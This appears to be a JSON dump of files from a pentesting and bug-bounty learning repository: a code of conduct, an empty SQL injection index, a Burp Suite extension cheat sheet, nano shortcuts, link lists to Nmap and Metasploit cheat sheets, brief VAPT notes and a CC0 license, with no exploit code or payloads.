\n\nHave questions, suggestions, feedback or want to contribute? If you can reply directly to my mail (resethackeroffical@gmail.com), I would love to hear from you.\n\nIf you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them ?? Thanks for reading!\n\n \n\n

\"Pentesting-Bugbounty//ResetCybersecuirty/\"

\n\n" }, { "path": "ResetCybersecuirty/code-of-conduct.md", "content": "# Contributor Covenant Code of Conduct\n\n## Our Pledge\n\nIn the interest of fostering an open and welcoming environment, we as\ncontributors and maintainers pledge to making participation in our project and\nour community a harassment-free experience for everyone, regardless of age, body\nsize, disability, ethnicity, gender identity and expression, level of experience,\nnationality, personal appearance, race, religion, or sexual identity and\norientation.\n\n## Our Standards\n\nExamples of behavior that contributes to creating a positive environment\ninclude:\n\n* Using welcoming and inclusive language\n* Being respectful of differing viewpoints and experiences\n* Gracefully accepting constructive criticism\n* Focusing on what is best for the community\n* Showing empathy towards other community members\n\nExamples of unacceptable behavior by participants include:\n\n* The use of sexualized language or imagery and unwelcome sexual attention or\nadvances\n* Trolling, insulting/derogatory comments, and personal or political attacks\n* Public or private harassment\n* Publishing others' private information, such as a physical or electronic\n address, without explicit permission\n* Other conduct which could reasonably be considered inappropriate in a\n professional setting\n\n## Our Responsibilities\n\nProject maintainers are responsible for clarifying the standards of acceptable\nbehavior and are expected to take appropriate and fair corrective action in\nresponse to any instances of unacceptable behavior.\n\nProject maintainers have the right and responsibility to remove, edit, or\nreject comments, commits, code, wiki edits, issues, and other contributions\nthat are not aligned to this Code of Conduct, or to ban temporarily or\npermanently any contributor for other behaviors that they deem inappropriate,\nthreatening, offensive, or harmful.\n\n## Scope\n\nThis Code of Conduct applies both within project spaces and in public spaces\nwhen an individual is representing the project or its community. Examples of\nrepresenting a project or community include using an official project e-mail\naddress, posting via an official social media account, or acting as an appointed\nrepresentative at an online or offline event. Representation of a project may be\nfurther defined and clarified by project maintainers.\n\n## Enforcement\n\nInstances of abusive, harassing, or otherwise unacceptable behavior may be\nreported by contacting the project team at resethackerofficial@gmail.com. All\ncomplaints will be reviewed and investigated and will result in a response that\nis deemed necessary and appropriate to the circumstances. The project team is\nobligated to maintain confidentiality with regard to the reporter of an incident.\nFurther details of specific enforcement policies may be posted separately.\n\nProject maintainers who do not follow or enforce the Code of Conduct in good\nfaith may face temporary or permanent repercussions as determined by other\nmembers of the project's leadership.\n\n## Attribution\n\nThis Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,\navailable at [https://contributor-covenant.org/version/1/4][version]\n\n[homepage]: https://contributor-covenant.org\n[version]: https://contributor-covenant.org/version/1/4/\n" }, { "path": "Sqlinjection.md", "content": "*RESETSQLi()**\n\nSQL injection(SQLi) is a kind of injection vulnerability in which the attacker tries to inject arbitrary pieces of malicious data(Code) into the input fields to get data from database.\n\nIndex | Content\n---|---\n**1** | [SQLi Documentation]()\n**2** | [SQLi Practice labs]()\n**3** | [SQLi Disclosure/Reports/POC]()\n**4** | [SQLi Mindmap]()\n**5** | [SQLi Tools]()\n**6** | [SQLi Ebooks]()\n**7** | [SQLi Researchers]()\n**8** | [SQLi CVE]() \n" }, { "path": "cheetsheets/BurpSuiteCheetsheet.md", "content": "## Hunting for Vulnerabilities with Burp Suite CheatSheet v1.0 :\n \n-**Chris Dale** @chrisadale:- Users can contribute with extensions to aid in the \ndiscovery of vulnerabilities. Be aware of false positives and use your pentesting capabilities to \nensure you fully explore the findings.\n \n-Param Miner \n>Allows high-performance identifying of unlinked \nparameters. Check for unlinked GET and Headers, \nand unlinked POST when applicable.\n\n-Backslash Powered Scanner \n>Will give alerts on interesting transformations of data \nor other interesting things. Often, it will be false positives, but it allows the penetration tester to focus on potential vulnerabilities.\n\n-Software Vulnerability scanner\n>Checks software version numbers against \nvulnhub.com for vulnerabilities.\n\n-HTTP Request Smuggler\n>This is an extension for Burp Suite designed to \nhelp you launch HTTP Request Smuggling \nattacks.\n\n-Active scan++\n>Allows us to find more vulnerabilities in terms of \nsuspicious input transformation, XML input \nhandling, host header attacks and more. \n\n-Retire.js\n>Finds outdated JavaScript and links to the \nrelevant CVE's for your investigations.\n" }, { "path": "cheetsheets/Nano.md", "content": "#File handling\n\n- Ctrl+S Save current file\n- Ctrl+O Offer to write file (\"Save as\")\n- Ctrl+R Insert a file into current one\n- Ctrl+X Close buffer, exit from nano\n\n#Editing\n- Ctrl+K Cut current line into cutbuffer\n- Alt+6\t Copy current line into cutbuffer\n- Ctrl+U Paste contents of cutbuffer\n- Alt+T\t Cut until end of buffer\n- Ctrl+] Complete current word\n- Alt+3\t Comment/uncomment line/region\n- Alt+U\t Undo last action\n- Alt+E\t Redo last undone action\n\n#Search and replace\n- Ctrl+Q Start backward search\n- Ctrl+W Start forward search\n- Alt+Q\t Find next occurrence backward\n- Alt+W\t Find next occurrence forward\n- Alt+R\t Start a replacing session\n\n#Deletion\n- Ctrl+H Delete character before cursor \n- Ctrl+D Delete character under cursor\n- Alt+Bsp Delete word to the left\n- Ctrl+Del Delete word to the right\n- Alt+Del Delete current line\n\n#Operations\n- Ctrl+T Execute some command\n- Ctrl+J Justify paragraph or region\n- Alt+J\t Justify entire buffer\n- Alt+B\t Run a syntax check\n- Alt+F\t Run a formatter/fixer/arranger\n- Alt+:\t Start/stop recording of macro\n- Alt+;\t Replay macro\n\n#Moving around\n- Ctrl+B One character backward\n- Ctrl+F One character forward\n- Ctrl+← One word backward\n- Ctrl+→ One word forward\n- Ctrl+A To start of line\n- Ctrl+E To end of line\n- Ctrl+P One line up\n- Ctrl+N One line down\n- Ctrl+↑ To previous block\n- Ctrl+↓ To next block\n- Ctrl+Y One page up\n- Ctrl+V One page down\n- Alt+\\\t To top of buffer\n- Alt+/\t To end of buffer\n\n#Special movement\n- Alt+G Go to specified line\n- Alt+]\t Go to complementary bracket\n- Alt+↑\t Scroll viewport up\n- Alt+↓\t Scroll viewport down\n- Alt+<\t Switch to preceding buffer\n- Alt+>\t Switch to succeeding buffer\n\n#Information\n- Ctrl+C Report cursor position\n- Alt+D\t Report line/word/character count\n- Ctrl+G Display help text\n\n#Various\n- Alt+A\t Turn the mark on/off\n- Tab Indent marked region\n- Shift+Tab Unindent marked region\n- Alt+V\t Enter next keystroke verbatim\n- Alt+N\t Turn line numbers on/off\n- Alt+P\t Turn visible whitespace on/off\n- Alt+X\t Hide or unhide the help lines\n- Ctrl+L Refresh the screen\n" }, { "path": "cheetsheets/Readme.md", "content": "# Pentesting Cheatsheets\n\nAuthor | Title\n-- | --\nChris Dale | [BurpSuite Cheatsheet v1.0](/cheetsheets/BurpSuiteCheetsheet.md)\nBlogs | [NMAP cheatsheets](/cheatsheets/nmapcheetsheet.md)\nBlog/ebook | [Metasploit cheatsheets](/cheetsheets/metasploitcheetsheet.md)\nBug Bounty/Checklist | [Bug Bounty checklist]( https://d.docs.live.net/7f17912d09b5e077/Documents/PEntesting.xlsx )\n\n# Pentesting Mindmap\n\nAuthor | Title\n-- | --\n**1** FroGyY | [Detailed Web-App-Pentesting Mindmap](https://github.com/iamthefrogy/Web-Application-Pentest-Checklist)\n" }, { "path": "cheetsheets/metasploitcheetsheet.md", "content": "# Cheetsgeet for Metasploit \nCheatsheet | Metasploit\n-- | --\nCheat Sheet | [Metasploit Cheat Sheet v1.](https://www.kitploit.com/2019/02/metasploit-cheat-sheet.html)\nCheat Sheet | [Metasploit Cheat Sheet v2.](https://www.amazon.com/Nmap-exploration-security-auditing-Cookbook/dp/1849517487)\n" }, { "path": "cheetsheets/nmapcheetsheet.md", "content": "Credit goes to the respective Author and Team RESETHACKER.\n\n# Cheetsgeet for NMAP \nCheatsheet | NMAP\n-- | --\nCheat Sheet | [NMAP Cheatsheet v1.](https://redteamtutorials.com/2018/10/14/nmap-cheatsheet/uh)\nCheat Sheet | [NMAP Cheatsheet v2.](https://www.ivoidwarranties.tech/posts/pentesting-tuts/nmap/cheatsheet/)\nCheat Sheet | [NMAP Cheatsheet v3.](https://www.stationx.net/nmap-cheat-sheet/)\nCheat Sheet | [NMAP Cheatsheet v4.](https://highon.coffee/blog/nmap-cheat-sheet/)\nMohamed M.Aly | [NMAP Mind MAP](https://drive.google.com/file/d/14xVPmJa9z3BdwiUFSDY2ZPbt7Mw242b4/view?usp=drivesdk)\n\n" }, { "path": "enterprises.md", "content": "# Enterprises\n\n- Who conducts VAPT?\n> Updating Soon\n\n- Benefit of VAPT? by Simran Singh\n> VAPT offers various benefits to the enterprise when it comes to system security such as:\n\n> a.It will give you a comprehensive evaluation of your application.\n\n> b.It will help you in understanding loopholes or errors that can lead to major cyber attacks.\n\n> c.VAPT gives a more detailed view of the threats that your network or application is facing.\n\n> d.It helps enterprises to protect their data and systems from malicious attacks.\n\n> e.VAPT is important to accomplish compliance standards.\n\n> f.Protects your business from data loss and unauthorized access.\n\n> g.It will help you in protecting your data from outside and insider threats.\n\n- Purpose\n>\n- Vulnerability serverity & impact analysis\n>\n- Difference between VA & PT ?\n>\n" }, { "path": "license", "content": "CC0 1.0 Universal\n\nStatement of Purpose\n\nThe laws of most jurisdictions throughout the world automatically confer exclusive Copyright and Related Rights (defined below) upon the creator and subsequent owner(s) (each and all, an \"owner\") of an original work of authorship and/or a database (each, a \"Work\").\n\nCertain owners wish to permanently relinquish those rights to a Work for the purpose of contributing to a commons of creative, cultural and scientific works (\"Commons\") that the public can reliably and without fear of later claims of infringement build upon, modify, incorporate in other works, reuse and redistribute as freely as possible in any form whatsoever and for any purposes, including without limitation commercial purposes. These owners may contribute to the Commons to promote the ideal of a free culture and the further production of creative, cultural and scientific works, or to gain reputation or greater distribution for their Work in part through the use and efforts of others.\n\nFor these and/or other purposes and motivations, and without any expectation of additional consideration or compensation, the person associating CC0 with a Work (the \"Affirmer\"), to the extent that he or she is an owner of Copyright and Related Rights in the Work, voluntarily elects to apply CC0 to the Work and publicly distribute the Work under its terms, with knowledge of his or her Copyright and Related Rights in the Work and the meaning and intended legal effect of CC0 on those rights.\n\nCopyright and Related Rights. A Work made available under CC0 may be protected by copyright and related or neighboring rights (\"Copyright and Related Rights\"). Copyright and Related Rights include, but are not limited to, the following:\ni. the right to reproduce, adapt, distribute, perform, display, communicate, and translate a Work;\n\nii. moral rights retained by the original author(s) and/or performer(s);\n\niii. publicity and privacy rights pertaining to a person's image or likeness depicted in a Work;\n\niv. rights protecting against unfair competition in regards to a Work, subject to the limitations in paragraph 4(a), below;\n\nv. rights protecting the extraction, dissemination, use and reuse of data in a Work;\n\nvi. database rights (such as those arising under Directive 96/9/EC of the European Parliament and of the Council of 11 March 1996 on the legal protection of databases, and under any national implementation thereof, including any amended or successor version of such directive); and\n\nvii. other similar, equivalent or corresponding rights throughout the world based on applicable law or treaty, and any national implementations thereof.\n\nWaiver. To the greatest extent permitted by, but not in contravention of, applicable law, Affirmer hereby overtly, fully, permanently, irrevocably and unconditionally waives, abandons, and surrenders all of Affirmer's Copyright and Related Rights and associated claims and causes of action, whether now known or unknown (including existing as well as future claims and causes of action), in the Work (i) in all territories worldwide, (ii) for the maximum duration provided by applicable law or treaty (including future time extensions), (iii) in any current or future medium and for any number of copies, and (iv) for any purpose whatsoever, including without limitation commercial, advertising or promotional purposes (the \"Waiver\"). Affirmer makes the Waiver for the benefit of each member of the public at large and to the detriment of Affirmer's heirs and successors, fully intending that such Waiver shall not be subject to revocation, rescission, cancellation, termination, or any other legal or equitable action to disrupt the quiet enjoyment of the Work by the public as contemplated by Affirmer's express Statement of Purpose.\n\nPublic License Fallback. Should any part of the Waiver for any reason be judged legally invalid or ineffective under applicable law, then the Waiver shall be preserved to the maximum extent permitted taking into account Affirmer's express Statement of Purpose. In addition, to the extent the Waiver is so judged Affirmer hereby grants to each affected person a royalty-free, non transferable, non sublicensable, non exclusive, irrevocable and unconditional license to exercise Affirmer's Copyright and Related Rights in the Work (i) in all territories worldwide, (ii) for the maximum duration provided by applicable law or treaty (including future time extensions), (iii) in any current or future medium and for any number of copies, and (iv) for any purpose whatsoever, including without limitation commercial, advertising or promotional purposes (the \"License\"). The License shall be deemed effective as of the date CC0 was applied by Affirmer to the Work. Should any part of the License for any reason be judged legally invalid or ineffective under applicable law, such partial invalidity or ineffectiveness shall not invalidate the remainder of the License, and in such case Affirmer hereby affirms that he or she will not (i) exercise any of his or her remaining Copyright and Related Rights in the Work or (ii) assert any associated claims and causes of action with respect to the Work, in either case contrary to Affirmer's express Statement of Purpose.\n\nLimitations and Disclaimers.\n\na. No trademark or patent rights held by Affirmer are waived, abandoned, surrendered, licensed or otherwise affected by this document.\n\nb. Affirmer offers the Work as-is and makes no representations or warranties of any kind concerning the Work, express, implied, statutory or otherwise, including without limitation warranties of title, merchantability, fitness for a particular purpose, non infringement, or the absence of latent or other defects, accuracy, or the present or absence of errors, whether or not discoverable, all to the greatest extent permissible under applicable law.\n\nc. Affirmer disclaims responsibility for clearing rights of other persons that may apply to the Work or any use thereof, including without limitation any person's Copyright and Related Rights in the Work. Further, Affirmer disclaims responsibility for obtaining any necessary consents, permissions or other rights required for any use of the Work.\n\nd. Affirmer understands and acknowledges that Creative Commons is not a party to this document and has no duty or obligation with respect to this CC0 or use of the Work.\n\nFor more information, please see https://creativecommons.org/publicdomain/zero/1.0\n" } ]